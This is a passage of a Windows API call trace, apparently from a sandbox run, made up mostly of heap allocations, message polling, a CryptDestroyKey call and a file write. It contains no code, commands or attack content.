| out: hHeap=0x970000) returned 1 [0230.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0230.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0230.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0230.921] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.921] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0230.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.921] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0230.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0230.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0230.922] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0230.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0230.922] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0230.922] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0230.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3bb0) returned 0x2f1fb40 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3bb0) returned 0x2f272b0 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1fb40 | out: hHeap=0x970000) returned 1 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3bb0) returned 0x2f1fb40 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f272b0 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3bb0) returned 0x2f272b0 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1fb40 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1bf88 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0230.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f183d0 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f236f8 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0230.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0230.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3bb0) returned 0x3bf0dd8 [0230.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f272b0 | out: hHeap=0x970000) returned 1 [0230.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0230.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0230.934] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.934] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x3bb0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x3bb0, lpOverlapped=0x0) returned 1 [0230.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0230.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0230.937] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0230.937] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0230.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.937] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0230.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0230.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51058, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0230.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.938] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0230.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0230.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.938] CryptDestroyKey (hKey=0xa87310) returned 1 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.938] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.939] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.939] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0230.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0230.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.939] 